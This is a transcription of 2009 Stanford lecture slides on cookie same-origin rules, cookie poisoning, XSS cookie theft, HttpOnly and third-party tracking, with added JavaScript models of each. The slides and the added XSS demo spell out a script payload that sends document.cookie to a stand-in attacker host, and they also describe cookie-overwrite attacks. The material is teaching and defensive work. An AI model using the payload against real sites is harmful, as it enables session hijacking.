Cookie Same Origin Policy
Dan Boneh, CS 142, Winter 2009

Monday: session management using cookies

Same origin policy: "high level"
- Review: Same Origin Policy (SOP) for the DOM: origin A can access origin B's DOM if the two match on (scheme, domain, port)
- Today: Same Origin Policy (SOP) for cookies: generally speaking, based on (scheme, domain, path)
  scheme://domain:port/path?params

Setting/deleting cookies by server
- Browser -> Server: GET ...
- Server -> Browser, HTTP header:
  Set-Cookie: NAME=VALUE; domain=(when to send); path=(when to send); secure (only send over SSL); expires=(when it expires); HttpOnly (later)
- If expires is absent: this session only
- Delete a cookie by setting "expires" to a date in the past
- Default scope is the domain and path of the setting URL

Scope setting rules (write SOP)
- domain: any domain-suffix of the URL hostname, except a TLD
  Example: a host can set cookies for itself and for its parent domain, but not for another site or for the TLD
  Problematic for sites like .stanford.edu: any host under the domain can set a cookie that every other host under it receives
- path: can be set to anything
  (diagram: allowed vs. disallowed domain settings)
Cookies are identified by (name, domain, path)
- cookie 1: name=userid, value=test, domain=... (the setting host), path=/, secure
- cookie 2: name=userid, value=test123, domain=... (its parent domain), path=/, secure
- Both cookies are stored in the browser's cookie jar; both are in scope of the setting host; they are distinct cookies because the domain differs

Reading cookies on server (read SOP)
- Browser sends all cookies in URL scope: cookie-domain is a domain-suffix of URL-domain, and cookie-path is a prefix of URL-path, and the protocol is HTTPS if the cookie is "secure"
- Goal: server only sees cookies in its scope
- Browser -> Server: GET //URL-domain/URL-path with Cookie: NAME=VALUE

Examples
- cookie 1: name=userid, value=u1, domain=... (the setting host), path=/, secure
- cookie 2: name=userid, value=u2, domain=... (its parent domain), path=/, non-secure
- Both set by the same login host
- Request over plain http (to the setting host or to another host under the parent domain): Cookie: userid=u2 (cookie 1 is secure, so it is not sent over http)
- Request over https to the setting host: Cookie: userid=u1; userid=u2 (arbitrary order)

Client side read/write: document.cookie
- Setting a cookie in JavaScript: document.cookie = "name=value; expires=...; "
- Reading a cookie: alert(document.cookie) prints a string containing all cookies available to the document (based on protocol, domain, path)
- Deleting a cookie: document.cookie = "name=; expires=Thu, 01-Jan-70"
- document.cookie is often used to customize the page in JavaScript

JavaScript URL
- javascript:alert(document.cookie) displays all cookies for the current document
Viewing/deleting cookies in the browser UI

Cookie protocol problems
- Server is blind: it does not see cookie attributes (e.g. secure) and does not see which domain set the cookie
- Server only sees: Cookie: NAME=VALUE

Example 1: login server problems
- Alice logs in at the login host; it sets a session-id cookie for the whole parent domain
- Alice visits an attacker-controlled host under the same parent domain; it overwrites the parent-domain session-id cookie with the session-id of user "badguy"
- Alice visits cs142hw to submit homework; cs142hw thinks it is talking to "badguy"
- Problem: cs142hw expects the session-id set by the login host; it cannot tell that the session-id cookie was overwritten

Example 2: "secure" cookies are not secure
- Alice logs in at https://... and later visits http://... (cleartext)
- A network attacker can inject into the cleartext response: Set-Cookie: LSID=badguy; secure, and overwrite the secure cookie
- Problem: a network attacker can re-write HTTPS cookies! An HTTPS cookie value cannot be trusted

Interaction with the DOM SOP
- Cookie SOP: path separation: a page under one path does not see cookies scoped to another path on the same host
- This is not a security measure: under the DOM SOP the page has full access to the DOM of the page under the other path (same scheme, host, port)
- Path separation is done for efficiency, not security: a page is only sent the cookies it needs
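The write SOP, the read SOP, cookie identity by (name, domain, path), the Examples slide, and the two attacks in Example 1 and Example 2, all replayed against a small model of the browser cookie jar. This is an added example, not code from the slides: it follows the 2009-era suffix-matching rule the slides describe (browsers today, per RFC 6265, treat a cookie without a Domain attribute as host-only and use a directory-aware path match), and the hostnames login.site.com, evil.site.com, checkout.site.com and cs142hw.site.com are assumed stand-ins for the ones on the slides.

```javascript
// Added example, not from the slides: a minimal model of the browser cookie jar implementing
// the write SOP (Domain must be the setting host or a parent domain, never a TLD), the read SOP
// (domain-suffix, path-prefix, "secure" only over https) and cookie identity by (name, domain, path).
// Hostnames used below (login.site.com, evil.site.com, ...) are assumed for illustration.

// Stand-in for a real public-suffix list: a domain with no interior dot is treated as a TLD.
function isTld(domain) {
  return !domain.includes(".");
}

// Default path per the slides: the path of the setting URL, up to its last "/".
function defaultPath(pathname) {
  const i = pathname.lastIndexOf("/");
  return i <= 0 ? "/" : pathname.slice(0, i);
}

class CookieJar {
  constructor() { this.cookies = []; }

  // Apply one Set-Cookie header received in the response to `url`.
  // Returns false if the write SOP rejects the Domain attribute.
  setCookie(url, header) {
    const u = new URL(url);
    const [pair, ...attrs] = header.split(";").map(s => s.trim());
    const eq = pair.indexOf("=");
    const c = { name: pair.slice(0, eq), value: pair.slice(eq + 1),
                domain: u.hostname, path: defaultPath(u.pathname), secure: false };
    for (const a of attrs) {
      const [k, v = ""] = a.split("=").map(s => s.trim());
      switch (k.toLowerCase()) {
        case "domain": {
          const d = v.replace(/^\./, "").toLowerCase();
          // write SOP: the setting host may only set cookies for itself or a parent domain, not a TLD
          if (isTld(d) || !(u.hostname === d || u.hostname.endsWith("." + d))) return false;
          c.domain = d;
          break;
        }
        case "path": c.path = v; break;
        case "secure": c.secure = true; break;
        // expires and HttpOnly are not modelled here
      }
    }
    // Identity is (name, domain, path): an existing cookie with the same triple is overwritten.
    const i = this.cookies.findIndex(x => x.name === c.name && x.domain === c.domain && x.path === c.path);
    if (i >= 0) this.cookies[i] = c; else this.cookies.push(c);
    return true;
  }

  // Read SOP: the Cookie header the browser attaches to a request for `url`.
  // Only NAME=VALUE pairs go out; the server never sees domain, path or secure.
  cookieHeader(url) {
    const u = new URL(url);
    return this.cookies
      .filter(c => u.hostname === c.domain || u.hostname.endsWith("." + c.domain)) // cookie-domain is a suffix of URL-domain
      .filter(c => u.pathname.startsWith(c.path))                                  // cookie-path is a prefix of URL-path
      .filter(c => !c.secure || u.protocol === "https:")                            // secure cookies only over HTTPS
      .map(c => `${c.name}=${c.value}`)
      .join("; ");
  }
}

// Walk through the slides' scenarios; returns the Cookie headers a server would see at each step.
function runScenario() {
  const jar = new CookieJar();
  // "Examples" slide: both cookies set by the login host
  jar.setCookie("https://login.site.com/", "userid=u1; domain=login.site.com; path=/; secure");
  jar.setCookie("https://login.site.com/", "userid=u2; domain=.site.com; path=/");
  const out = {
    checkoutHttp: jar.cookieHeader("http://checkout.site.com/"),  // userid=u2 (u1 is scoped to login.site.com)
    loginHttp: jar.cookieHeader("http://login.site.com/"),        // userid=u2 (u1 is secure, not sent over http)
    loginHttps: jar.cookieHeader("https://login.site.com/"),      // userid=u1; userid=u2
    // write SOP: a host may not set a cookie for a TLD or for an unrelated site
    tldRejected: !jar.setCookie("https://login.site.com/", "x=1; domain=.com"),
    otherSiteRejected: !jar.setCookie("https://login.site.com/", "x=1; domain=other.com"),
  };
  // Example 1: a sibling host under .site.com overwrites the parent-domain cookie with badguy's id
  jar.setCookie("http://evil.site.com/", "userid=badguy; domain=.site.com; path=/");
  out.afterEvil = jar.cookieHeader("https://cs142hw.site.com/submit");  // userid=badguy, and cs142hw cannot tell
  // Example 2: a cleartext response carries "Set-Cookie: ...; secure" and clobbers the HTTPS-only cookie
  jar.setCookie("http://login.site.com/", "userid=badguy2; domain=login.site.com; path=/; secure");
  out.afterInjection = jar.cookieHeader("https://login.site.com/");      // userid=badguy2; userid=badguy
  return out;
}
```

The three headers in `runScenario` are exactly what the Examples slide shows, and `afterEvil` / `afterInjection` show why the two attacks work: the server receives only `NAME=VALUE`, so the overwritten cookie is indistinguishable from the one the login host set.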
Cookies have no integrity!

Storing security data on the browser?
- User can change and delete cookie values! Edit the cookie file (FF3: cookies.sqlite); modify the Cookie header (FF: TamperData extension)
- Silly example: shopping cart software sends Set-Cookie: shopping-cart-total=150 ($)
- User edits the cookie file (cookie poisoning) and sends back Cookie: shopping-cart-total=15 ($)
- Similar to the problem with hidden fields

Not so silly (as of 2/2000)
- D3.COM Pty Ltd: ShopFactory 5.8
- Retail Corporation: Retail
- Adgrafix: Check It Out
- Baron Consulting Group: WebSite Tool
- ComCity Corporation: SalesCart
- Crested Butte Software: EasyCart
- D: Dansie Shopping Cart
- Intelligent Vending Systems: Intellivend
- Make-a-Store: Make-a-Store OrderPage
- McMurtrey/Whitaker & Associates: Cart32 3.0
- pknutsennethut.no: CartMan 1.04
- Rich Media Technologies: JustAddCommerce 5.0
- SmartCart: SmartCart
- Web Express: Shoptron 1.2
Source: http://...

Solution: cryptographic checksums
- Goal: data integrity. Requires a secret key k unknown to the browser
- Server holds k and generates a tag T <- F(k, value); the cookie carries value together with T, and on every request the server recomputes the tag and rejects the cookie if it does not match
- "value" should also contain data to prevent cookie replay and swap (e.g. an expiry and the identity of the user it was issued to)

Example: .NET 2.0
- System.Web.Configuration.MachineKey: secret web server key intended for cookie protection; stored on all web servers in the site
- Creating an encrypted cookie with integrity:
    HttpCookie cookie = new HttpCookie(name, val);
    HttpCookie encodedCookie = HttpSecureCookie.Encode(cookie);
- Decrypting and validating an encrypted cookie:
    HttpSecureCookie.Decode(cookie);
Cookie theft: basic cross site scripting (XSS)

Example: reflected XSS
- Search field on a site: http://.../search.php?term=apple
- Server-side implementation of search.php returns a page with title "Search Results" whose body reads "Results for <term>: ..." with the search term echoed into the HTML unescaped

Bad input
- Consider the link (properly URL encoded): http://.../search.php?term=<script>window.open("http://.../?cookie=" + document.cookie)</script>
- What if the user clicks on this link? The browser goes to the victim site's search.php; the site returns a page containing Results for <script>...</script>; the browser executes the script, which sends the victim site's cookie to the attacker's site

So what?
- Why would a user click on such a link? Phishing email; link in a DoubleClick banner ad; many, many ways to fool a user into clicking
- MANY other forms of XSS (Monday); many do not require clicking on links

HttpOnly cookies (IE6 SP1, FF 2.0.0.5; not Safari)
- Server -> Browser, HTTP header: Set-Cookie: NAME=VALUE; HttpOnly
- The cookie is sent over HTTP(S), but is not accessible to scripts: it cannot be read via document.cookie, and access from XMLHttpRequest response headers is blocked too
- Helps prevent cookie theft via XSS, but does not stop most other risks of XSS bugs

THE END
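The search.php page from the reflected-XSS slide, rendered the vulnerable way (term echoed unescaped) beside the fix (term HTML-escaped), with the slide's cookie-stealing link parsed back out the way the server's `$_GET` would. This is an added example, not the slides' PHP: victim.com and badguy.com are assumed hostnames, and checking the rendered string for a `<script` tag stands in for what a browser would do with the markup.

```javascript
// Added example, not from the slides: the reflected-XSS search page rendered unescaped (the bug)
// and escaped (the fix). Hostnames victim.com / badguy.com are assumed for illustration.

// Minimal HTML escaping for text inserted into element content or attribute values.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, ch => map[ch]);
}

// What the slide's search.php does: the term goes straight into the page.
function renderVulnerable(term) {
  return `<HTML><TITLE>Search Results</TITLE><BODY>Results for ${term}:</BODY></HTML>`;
}

// The fix: the same page, but the term is escaped so the browser treats it as text.
function renderSafe(term) {
  return `<HTML><TITLE>Search Results</TITLE><BODY>Results for ${escapeHtml(term)}:</BODY></HTML>`;
}

// The link the attacker sends: the slide's cookie-stealing script, URL-encoded into ?term=.
const PAYLOAD = '<script>window.open("http://badguy.com/?cookie=" + document.cookie)</script>';
const ATTACK_URL = "http://victim.com/search.php?term=" + encodeURIComponent(PAYLOAD);

// Server side: recover the term from the query string, as $_GET["term"] would.
function termFromUrl(url) {
  return new URL(url).searchParams.get("term");
}

// Stand-in for the browser: does the rendered document contain an executable script tag?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

function xssDemo() {
  const term = termFromUrl(ATTACK_URL);
  return {
    roundTripped: term === PAYLOAD,                                 // the encoded link decodes to the script
    vulnerableExecutes: containsScriptTag(renderVulnerable(term)),  // true: browser runs it, cookie leaves
    safeExecutes: containsScriptTag(renderSafe(term)),              // false: shown as literal text
  };
}
```

Escaping on output is the fix for this bug class; HttpOnly on the session cookie only limits what the script can steal once it is already running in the victim origin.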
3rd party cookies: user tracking

3rd party cookies
- What they are: user goes to site A.com and obtains a page. The page contains content loaded from B.com. The browser goes to B.com and obtains that content; the HTTP response contains a cookie. The cookie from B.com is called a 3rd party cookie
- Tracking: user goes to site D.com; D.com also contains content from B.com. B.com obtains the cookie it set when the user visited A.com, so B.com knows the user visited both A.com and D.com

Can we block 3rd party cookies?
- IE and Safari: block set/write. Ignore the "Set-Cookie" HTTP header from 3rd parties. A site that sets a cookie as a 1st party will still be given that cookie when contacted as a 3rd party. Enabled by default in IE7
- Firefox and Opera: block send/read. Always implement "Set-Cookie", but never send cookies to a 3rd party. Breaks session management at several sites (off by default)

Effectiveness of 3rd party blocking
- Ineffective for improving privacy: a 3rd party can become a first party and then set its cookie; Flash cookies are not controlled by the browser cookie policy
- IE8 InPrivate browsing and Chrome incognito: upon exit, delete all browser state collected while in private browsing
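The tracking flow and the two blocking policies on the slides, in a toy model: a browser with a per-host cookie store, a tracker at B.com, and the A.com/D.com visits, run once per policy. This is an added example, not code from the slides; the hostnames are the slides' own, while the policy names, the `id=N` cookie format and the "visit the tracker as a first party first" step are assumptions made to show why set-blocking alone does not help.

```javascript
// Added example, not from the slides: a toy browser with a per-host cookie store and the two
// third-party-cookie policies described on the slides. A request counts as "third party" when
// the host it goes to differs from the site in the address bar. The id format is an assumption.
class Browser {
  // policy: "none", "block-set" (IE/Safari: ignore Set-Cookie from 3rd parties)
  //         or "block-send" (Firefox/Opera: honour Set-Cookie, never send cookies to 3rd parties)
  constructor(policy) { this.policy = policy; this.jar = new Map(); }

  // One exchange with `host` while the address bar shows `topSite`. `server` receives the Cookie
  // header the browser sends (or null) and returns a Set-Cookie value (or null).
  fetch(topSite, host, server) {
    const thirdParty = host !== topSite;
    const stored = this.jar.get(host) || null;
    const sent = thirdParty && this.policy === "block-send" ? null : stored;
    const setCookie = server(sent);
    if (setCookie !== null && !(thirdParty && this.policy === "block-set")) this.jar.set(host, setCookie);
    return sent;
  }
}

// B.com's tracker: hands a fresh id to a browser that presents no cookie, and records every id
// it gets back. The recorded ids are what lets it link visits to different sites.
function makeTracker() {
  let next = 1;
  const seen = [];
  return {
    seen,
    serve(cookie) {
      if (cookie === null) return `id=${next++}`;
      seen.push(cookie);
      return null;
    },
  };
}

// The slides' scenario: A.com and D.com both embed B.com. With `trackerFirstPartyFirst` the user
// visits B.com directly beforehand, which is how a blocked 3rd party "becomes first party".
// Returns the ids B.com saw: the same id appearing twice means A.com and D.com were linked.
function simulate(policy, trackerFirstPartyFirst) {
  const tracker = makeTracker();
  const browser = new Browser(policy);
  if (trackerFirstPartyFirst) browser.fetch("B.com", "B.com", tracker.serve);
  for (const site of ["A.com", "D.com"]) {
    browser.fetch(site, site, () => null);        // the page itself (sets nothing in this model)
    browser.fetch(site, "B.com", tracker.serve);  // the embedded B.com content
  }
  return tracker.seen;
}
```

With no policy the id issued on A.com comes back from D.com, so the two visits are linked. Set-blocking stops that only until the user visits B.com directly once; after that the first-party cookie is sent on every embed, which is the slides' "ineffective for improving privacy" point. Send-blocking never hands the id back, but every embedded response re-issues a fresh cookie that overwrites B.com's own first-party one, the kind of breakage the slides note.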